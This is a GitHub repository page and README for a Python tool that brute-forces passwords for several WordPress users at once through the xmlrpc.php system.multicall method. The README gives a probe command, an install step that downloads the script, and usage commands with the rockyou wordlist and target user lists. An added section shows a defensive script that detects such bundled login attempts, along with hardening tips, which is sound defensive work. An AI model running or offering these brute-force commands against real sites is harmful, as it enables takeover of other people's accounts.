https://github.com/entr0pie/wp-multi-bruteforce
Script for bruteforcing multiple Wordpress Users (XMLRPC)
- Host: GitHub
- URL: https://github.com/entr0pie/wp-multi-bruteforce
- Owner: entr0pie
- License: gpl-3.0
- Created: 2022-11-17T00:56:09.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2023-01-14T04:45:45.000Z (over 3 years ago)
- Last Synced: 2025-01-29T08:33:53.217Z (over 1 year ago)
- Topics: brute-force, brute-force-attacks, bruteforce-wordlist, bruteforcing, wordpress, wordpress-api, wordpress-security, wordpress-site, xml, xmlrpc, xmlrpc-bruteforcer
- Language: Python
- Homepage:
- Size: 233 KB
- Stars: 8
- Watchers: 1
- Forks: 4
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# WP Multi-User Bruteforce
Python 3 script for bruteforcing multiple WordPress users using only one request per password.

## How does it work?
The [HackTricks WordPress Pentesting Guide](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress#xml-rpc) notes that, if `xmlrpc.php` is enabled, its methods can be abused for brute-force and DoS attacks. In particular, the `system.multicall` method lets a client bundle login attempts for multiple users into **only one request** (see the screenshot [here](https://1517081779-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FILyTlmNzv1D9YhHQAJo2%2Fimage.png?alt=media&token=5aa88cc4-baa0-4e54-87c1-2cc31203199d)).
## Testing the vulnerability
Run this command, replacing `your-blog.com` with your website:
```
YOURBLOG=http://your-blog.com/xmlrpc.php
curl -d "system.listMethods" -X POST $YOURBLOG
```
Check whether the response is an XML list of the available methods, like:
```
system.multicall
system.listMethods
system.getCapabilities
demo.addTwoNumbers
[...]
```
If it is, the endpoint is probably vulnerable.
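From the defender's side, the pattern described above (login attempts for several users packed into one `system.multicall` request) is easy to recognise in request bodies at a reverse proxy, WAF or request-logging pipeline. The script below is an added example for this page, not code from the wp-multi-bruteforce repository or the HackTricks guide. It parses a raw XML-RPC request body with the standard-library `xmlrpc.client` parser and reports how many credential-bearing calls one request carries; the thresholds, the credential-method table and the two sample bodies are assumptions made for the example.

```python
"""Detect credential guessing bundled into an XML-RPC system.multicall request.

Added example for this page; not code from the wp-multi-bruteforce repository.
It inspects one raw XML-RPC request body (as a reverse proxy, WAF or logging
pipeline would see it) and reports how many login-bearing calls it packs in.
"""
import xmlrpc.client

# WordPress XML-RPC methods that authenticate with username/password, and the
# argument positions of those two values: wp.getUsersBlogs(username, password);
# the other wp.* methods take (blog_id, username, password, ...).
CREDENTIAL_METHODS = {
    "wp.getUsersBlogs": (0, 1),
    "wp.getProfile": (1, 2),
    "wp.getUsers": (1, 2),
    "wp.getPosts": (1, 2),
}

# Assumed policy values (tune per site): more than MAX_LOGIN_CALLS_PER_REQUEST
# login-bearing calls in one request is treated as guessing, and bodies larger
# than MAX_BODY_BYTES are rejected before parsing (expat has no size limit).
MAX_LOGIN_CALLS_PER_REQUEST = 3
MAX_BODY_BYTES = 256 * 1024


def credentials_in_call(call):
    """Return (username, password) for one inner multicall entry, else None."""
    if not isinstance(call, dict):
        return None
    slots = CREDENTIAL_METHODS.get(call.get("methodName"))
    args = call.get("params", [])
    if slots is None or not isinstance(args, list) or len(args) <= slots[1]:
        return None
    return str(args[slots[0]]), str(args[slots[1]])


def analyze_request(body: bytes) -> dict:
    """Classify one XML-RPC request body; never raises on malformed input.

    Only counts are reported so that guessed passwords never reach alert logs.
    """
    result = {"method": None, "calls": 0, "login_calls": 0, "distinct_users": 0,
              "distinct_passwords": 0, "flagged": False, "reason": ""}
    if len(body) > MAX_BODY_BYTES:
        result.update(flagged=True, reason="oversized body")
        return result
    try:
        params, method = xmlrpc.client.loads(body.decode("utf-8", "replace"))
    except Exception as exc:  # ExpatError, ResponseError, ...
        result.update(flagged=True, reason=f"unparseable: {type(exc).__name__}")
        return result
    result["method"] = method
    if method != "system.multicall" or not params or not isinstance(params[0], list):
        result["calls"] = 1  # an ordinary single-method call
        return result
    users, passwords = set(), set()
    for call in params[0]:
        cred = credentials_in_call(call)
        if cred is not None:
            users.add(cred[0])
            passwords.add(cred[1])
            result["login_calls"] += 1
    result["calls"] = len(params[0])
    result["distinct_users"] = len(users)
    result["distinct_passwords"] = len(passwords)
    if result["login_calls"] > MAX_LOGIN_CALLS_PER_REQUEST:
        result["flagged"] = True
        result["reason"] = (f"{result['login_calls']} login attempts for "
                            f"{len(users)} user(s) in one multicall")
    return result


# Constructed sample bodies (made-up users and guesses), embedded so the script
# runs offline: a multicall with two users x two guesses, and a plain listMethods.
SAMPLE_MULTICALL = b"""<?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><string>admin</string></value><value><string>guess-1</string></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><string>admin</string></value><value><string>guess-2</string></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><string>editor</string></value><value><string>guess-1</string></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><string>editor</string></value><value><string>guess-2</string></value></data></array></value></member></struct></value>
</data></array></value></param></params></methodCall>
"""
SAMPLE_LIST_METHODS = (b'<?xml version="1.0"?><methodCall><methodName>system.listMethods'
                       b"</methodName><params></params></methodCall>")

if __name__ == "__main__":
    for label, body in (("multicall", SAMPLE_MULTICALL), ("listMethods", SAMPLE_LIST_METHODS)):
        print(label, analyze_request(body))
```

Running the script prints a verdict for each sample: the multicall body is flagged with four login attempts for two users, the `system.listMethods` call is not. On the WordPress side, the same pattern can be closed off at the application: the `xmlrpc_methods` filter can drop `system.multicall` from the method table, and the `xmlrpc_enabled` filter turns XML-RPC off entirely when no legitimate client depends on it.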
## Installation
```
pip install requests
curl https://raw.githubusercontent.com/entr0pie/xmlrpc-multi-request/main/xmlrpc.py | tee xmlrpc.py
```
## Usage
### Using the default wordlist (rockyou.txt)
```
python3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader
```
### Setting a wordlist:
```
python3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader --wordlist=my_wordlist.txt
```
### Starting the bruteforce from a specific word inside the wordlist:
```
python3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader --wordlist=my_wordlist.txt --word=super_secure_password
```
### Using the config.json file:
By default, xmlrpc.py saves the last session to `config.json`:
```
{
  "host": "http://your-blog.com/xmlrpc.php",
  "users": "['admin', 'editor', 'reader']",
  "wordlist": "/usr/share/wordlists/rockyou.txt",
  "word": "mcfly",
  "debug": "False"
}
```
You can replay that session by running:
```
python3 xmlrpc.py --config config.json
```
## License
This project is under [GNU GPLv3](LICENSE).